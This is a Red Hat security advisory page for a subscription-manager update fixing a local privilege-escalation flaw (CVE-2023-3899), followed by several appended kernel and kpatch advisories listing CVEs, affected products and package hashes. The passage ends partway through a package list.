An update for subscription-manager is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-3899: A vulnerability was found in subscription-manager that allows local privilege escalation due to inadequate authorization. The D-Bus interface com.redhat.RHSM1 exposes a significant number of methods to all users that could change the state of the registration. By using the com.redhat.RHSM1.Config.SetAll() method, a low-privileged local user could tamper with the state of the registration, by unregistering the system or by changing the current entitlements. This flaw allows an attacker to set arbitrary configuration directives for /etc/rhsm/rhsm.conf, which can be abused to cause a local privilege escalation to an unconfined root.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-08-22

Updated:

2023-08-22

**RHSA-2023:4702 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: subscription-manager security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for subscription-manager is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

The subscription-manager packages provide programs and libraries to allow users to manage subscriptions and yum repositories from the Red Hat entitlement platform.  

Security Fix(es):  

*   subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus interface allows local users to modify configuration (CVE-2023-3899)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.1 ppc64le
*   Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.1 x86\_64

**Fixes**

*   BZ - 2225407 - CVE-2023-3899 subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus interface allows local users to modify configuration

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.1**

SRPM

subscription-manager-1.25.17.1-2.el8\_1.src.rpm

SHA-256: 7b9e528a9e35e21a2cce5dd3a9f1c29274f3801fa986b7e66120e6ed7278b1a6

ppc64le

dnf-plugin-subscription-manager-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: edfac5f32332217d14b7298d144d3b6545d017067da13a7e55b8ef64cd8f742d

dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 878c8ad673d6ea64cf3a78d366816683a9b72474b4e436f5c76c2930e1b1fe8c

dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 878c8ad673d6ea64cf3a78d366816683a9b72474b4e436f5c76c2930e1b1fe8c

python3-subscription-manager-rhsm-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: ee0a8295f1a99ceaa0c50f85b26d902e0b22e85808d4426e720120ab24bca383

python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 91169da80b187f2cf319cccba8b7281e488de9c2e9bb4ac51ab304be32cb1f40

python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 91169da80b187f2cf319cccba8b7281e488de9c2e9bb4ac51ab304be32cb1f40

python3-syspurpose-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: e955e3d742a3e9b1314366476d034832273c9c2744ef53c5020e9673ed9dd160

rhsm-gtk-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 571c75dd61f7e734281b150461ce3709d6f88c099db64176a17f725f8f26b52a

subscription-manager-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 14a89c6dae4286ca43b1d0c44990a179d99f6e4b347bf04d5febb3868230e2a6

subscription-manager-cockpit-1.25.17.1-2.el8\_1.noarch.rpm

SHA-256: 203b38f60c6f2fca355b86e9ff651e34ad66f45ee8c54d4941d63342a265e4e7

subscription-manager-debuginfo-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 2f2a945f018b228c394f1a3a04dd28c0ad6af879d37778ac5d0e5dc4a6637f67

subscription-manager-debuginfo-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 2f2a945f018b228c394f1a3a04dd28c0ad6af879d37778ac5d0e5dc4a6637f67

subscription-manager-debugsource-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 8843afedecc627c97717a1134c7ef3e91741f84f31736f13e68d299e1d8caff1

subscription-manager-debugsource-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 8843afedecc627c97717a1134c7ef3e91741f84f31736f13e68d299e1d8caff1

subscription-manager-initial-setup-addon-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 8fc16e4a35426234e164d3122346297435a941eddcb894353d66bb992c2ff87b

subscription-manager-migration-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 764ea67575adf767d241f3514affe3b657ca38da5e655e28ee4074e4eae87a79

subscription-manager-plugin-container-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 349941aadfd1f728c842c8917cb33ff175fcd1ee1deee00dacd17fb6534fb06b

subscription-manager-plugin-ostree-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 6e447517b7b037b182d384e6dc03f1668ee5e023ebc1c480af857c9928c6f6fe

subscription-manager-rhsm-certificates-1.25.17.1-2.el8\_1.ppc64le.rpm

SHA-256: 872ffeac2cf64aad177a8479f03bfefdae63aa5f080254a1376dc5eb839c7d96

**Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.1**

SRPM

subscription-manager-1.25.17.1-2.el8\_1.src.rpm

SHA-256: 7b9e528a9e35e21a2cce5dd3a9f1c29274f3801fa986b7e66120e6ed7278b1a6

x86\_64

dnf-plugin-subscription-manager-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 6e76c3124f90dafee6e1b2617c90546cbfac65fea18015ba6c55e3c91ec5c5c3

dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 0bd861c8a13ae7a22386eca786e40f80aedabcb7377cb8dbc07928f082214418

dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 0bd861c8a13ae7a22386eca786e40f80aedabcb7377cb8dbc07928f082214418

python3-subscription-manager-rhsm-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 9d6bef8587e17f1a5fe5a29d870a599d4578907107f8ecbee578eb29bedad3ac

python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: caab5d073777f406b7a2a47c0d7e45315bc4803580c2f393bd0a6986bad3d83e

python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: caab5d073777f406b7a2a47c0d7e45315bc4803580c2f393bd0a6986bad3d83e

python3-syspurpose-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 487fa206be608d82189942c4e909fce5dfeea6007468b1f52872e694926f04de

rhsm-gtk-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 7a909b86ac388bfea2e851f1635f450fbe8ade2b20822afb9fb40ca6e0e19bf6

subscription-manager-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: e2d5fc017bb6ecc46060fff6f6673a7aa1bd7591fa8dac3c5eca9b4784657638

subscription-manager-cockpit-1.25.17.1-2.el8\_1.noarch.rpm

SHA-256: 203b38f60c6f2fca355b86e9ff651e34ad66f45ee8c54d4941d63342a265e4e7

subscription-manager-debuginfo-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 40b6c32ed849f0faa317d71b8997334c52949042fe3f08ab8f8596212e8ebb25

subscription-manager-debuginfo-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 40b6c32ed849f0faa317d71b8997334c52949042fe3f08ab8f8596212e8ebb25

subscription-manager-debugsource-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 21cbdbfcbbd1efc57e031c4e3c5e30f1d8c03ce24398f6c1a184cd02c13a8a44

subscription-manager-debugsource-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 21cbdbfcbbd1efc57e031c4e3c5e30f1d8c03ce24398f6c1a184cd02c13a8a44

subscription-manager-initial-setup-addon-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: af6d1c2076a7aa4ebf427c4bedeee1bff61e5b64517c88d1deeed7ee84eb7961

subscription-manager-migration-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 7133b94e6196c009e89d1d1249ee69d979b395a211a36f48952745500be3b897

subscription-manager-plugin-container-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 4f0560c79807eec9b4a414853748c93f3c15f453b4e1a9684c1664a48ed0733e

subscription-manager-plugin-ostree-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: 16f8fc1e3fe66c74a71922b337aa1153eadc704e85055deadb980c170a0d9985

subscription-manager-rhsm-certificates-1.25.17.1-2.el8\_1.x86\_64.rpm

SHA-256: e5a28c3c27ded83f1b2a2933b391bccc63f6f93c50470031c58400480aa3796a

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:4702: Red Hat Security Advisory: subscription-manager security update

Red Hat Security Advisory 2023-4699-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include information leakage, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:4699-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4699  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-20593 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.4  
Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.4) - noarch, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.4) - x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

* hw: amd: Cross-Process Information Leak (CVE-2023-20593)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation  
2217845 - CVE-2023-20593 hw: amd: Cross-Process Information Leak

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.4):

Source:  
kernel-3.10.0-693.112.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-693.112.1.el7.noarch.rpm  
kernel-doc-3.10.0-693.112.1.el7.noarch.rpm

x86_64:  
kernel-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-debug-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-devel-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-headers-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-tools-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-693.112.1.el7.x86_64.rpm  
perf-3.10.0-693.112.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-693.112.1.el7.x86_64.rpm  
python-perf-3.10.0-693.112.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-693.112.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.4):

x86_64:  
kernel-debug-debuginfo-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-693.112.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-693.112.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-693.112.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-693.112.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-20593  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5MQlAAoJENzjgjWX9erE2/EP/Rd0miatRmM9eRRTnyTpl7yi  
h18yUtT7QaoyvN2dRPeNJb/dNSczJUCAytEC4wNnoP+gMkYFGRgok5CKIaUKBE3b  
1EDkl/n1AR3YPMwKswwdSUQBuTiLlNWtRI/kwtCvoiapdGsJt9N4EY22FQuPMur8  
+4tsOrC+lLQ7tg1eoVXXJMufFvNHDFrAZDYV37HXQ94KevKe5/9+V9/zer2htcZ/  
7JOU6xhLSF4M7hSq/bMyU2MradXEwc/2muntL1gcVk1QB/eTE0N/v/yOo0WXXgB7  
44nH/zx/0vx+KjVhBHlzvlCprLl5PRKT0PfzNCw20wN7ruvixsvYNoaIqbyL4mZh  
lghnhfBNy3UkGmsV+84fxf3nHlC29S35hco0UpTOINLWWdza4Oe4OfzbvAQUa9A7  
0AegDnx6xBXsuDJ7nOm8p9QlJ7GxHdCUZ8srwhzWrrfLGq5uxG61tXA4PoGdZhVF  
2nf5wnK15PhKaLf6+zVS6uFBVgXlPE9QvEWOzjDNx0S+2m7bQxZjqLjCeOmvT4Th  
qXDOWxcCo5HYYNyPHqyBrkmfRq0h9WbzYjM75i517g5XhiRdAO0j+uPX55DqshJ9  
+z+pZrf/c6sMaBxX2pR3bZpRMnqZQZZcQn8GoI8fJheGBG1hmUJOBbi7FonpG2EG  
cty1g4CFIFBDxk87a7qQ  
=j/00  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4699-01

Red Hat Security Advisory 2023-4698-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:4698-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4698  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-35788   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
7.7 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
(CVE-2023-35788)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2215768 - CVE-2023-35788 kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()

6. Package List:

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kpatch-patch-3_10_0-1062_71_1-1-3.el7.src.rpm  
kpatch-patch-3_10_0-1062_72_1-1-2.el7.src.rpm  
kpatch-patch-3_10_0-1062_76_1-1-1.el7.src.rpm

ppc64le:  
kpatch-patch-3_10_0-1062_71_1-1-3.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_71_1-debuginfo-1-3.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_72_1-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_72_1-debuginfo-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_76_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_76_1-debuginfo-1-1.el7.ppc64le.rpm

x86_64:  
kpatch-patch-3_10_0-1062_71_1-1-3.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_71_1-debuginfo-1-3.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_72_1-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_72_1-debuginfo-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_76_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_76_1-debuginfo-1-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-35788  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5MPuAAoJENzjgjWX9erEdJcP/0fPZxQc82JROsbSp+T8cauP  
14927/sHy9zak5TIGqVBMwXDj1QH732Y5EvAhSJhxQjoooRG9ukG4dix3vEvPccL  
EOWB13kKBmUh7+BCguxeeP7vEIL4gJ2LH5QzpiHGt+lodwZoF+V0MTU61A8u9pcq  
cb+Z1oRr8MK6/PCTYqjxGjM7qU8dcyY7fVinQ5YY1TxrbUvnVGaNSI7AOeZwu2jy  
CBFs6oCikm8RRhbXGL7nIEfUIM+2n7pxxCjqotzIc1zknDYl67QVko5VWfzsdTcF  
SaUbQovkSGtIa5sxwh2qCG/V8uBYj1cMRcjUmWQ72IJymkLWMgh3sXjPesktHQJj  
qC54f0tnSHB/Ws995smD1UdXLeBJ2ZwQIVCYR3ISMP0xc5b6oX7G3lJuMvLX67sa  
mr158DC7dEbzC4SHmSwpO97ISr7ZQqqMHJjrXDzaqiTYKwrrBrYjIO55G1OVQPM7  
k82aW29ncj5qf0MIpmAO/kQVmzit/rRcNcGtDnUEsnpkTaPwcIK2o97L4Meidolx  
Eazn3lV8q0nDhq1ZYa6iTokMQlm8jt2UmcLdWypBfhPKc1IQal4acDR0A5l432TC  
FUVC8QVWWlwjGpvIh4A0n/fnQh0adBexwQS0sUFB7kNemFm6gfcOi5YWN9OWNnVm  
9cOVgjRwe9TNjnTPohiK  
=qAjS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4698-01

Red Hat Security Advisory 2023-4696-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include information leakage, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:4696-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4696  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-20593 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.6  
Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.6) - noarch, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.6) - x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

* hw: amd: Cross-Process Information Leak (CVE-2023-20593)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation  
2217845 - CVE-2023-20593 hw: amd: Cross-Process Information Leak

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.6):

Source:  
kernel-3.10.0-957.105.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-957.105.1.el7.noarch.rpm  
kernel-doc-3.10.0-957.105.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-debug-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-devel-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-headers-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-tools-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-957.105.1.el7.x86_64.rpm  
perf-3.10.0-957.105.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.105.1.el7.x86_64.rpm  
python-perf-3.10.0-957.105.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.105.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.6):

x86_64:  
kernel-debug-debuginfo-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.105.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-957.105.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.105.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.105.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-20593  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5MPrAAoJENzjgjWX9erEL2gP/jVYm6I22uhADJVQI22tx4nC  
4OZRXZ5g5G9SpdyU6SuH9DNErHaW651i7e3Eam1ql5QeX1qjATt2cAeaSv/zTHWo  
1ZIjWuAuCwpPSfJcBB7uCGSC2zbJ5d6ATg7+0IC2dHhvpAnAIHh8CQGpLu1xa0Xm  
vfzEfBwdhHCKy8Dm0dbi+Ic8sqzRNSc1z4d/ZDvfwLtUaooioDosLVXzdhIsmvSH  
wRfKieMPY4JkPOx/OXHDQPFHpE3kbdBgNsuJ4XvgC/a+eX/TKNsQzYr16KhmLGzH  
zNgdQv9tALV68a/2L/wmUTjklYtL9Mg1+ZGLq/sdsZ0ptsWwVHzVj6AN70V1NrKN  
d7B7fwGmU3nSosD74FCacfx9faxc7WLaDgEOasx+Ws9L+nMIe9BrPmUo0NWaT9F2  
KtNcKgXP+kcNqsg3XQQVLmjA7j8Jfylrz9AoKNcjFD+azK/sm8pybY512tQuncbM  
eJCsFeTbqEKuaRumc3wGV5jdY1Cg939UpG1ZyKnSbxTq0wlaxpnIt0cc9Wy2TFJ3  
EkLCAf3EwlElw3ojJmCISXgGMIV5kHSkA7eCcdlD/ccLdY9dO3L6gvExoMwUTE4M  
tDHSpOLsN2bUt3KhI9aNURlhtPoJgEcpLVShKQEr2wxnI4QrOetCVfpUCPBmaYWj  
PhR0VgkkOwTEjRI3iJfF  
=Dto+  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4696-01

Red Hat Security Advisory 2023-4697-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:4697-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4697  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-35788   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.7  
Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
(CVE-2023-35788)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2215768 - CVE-2023-35788 kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.7):

Source:  
kernel-3.10.0-1062.77.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.77.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.77.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.77.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
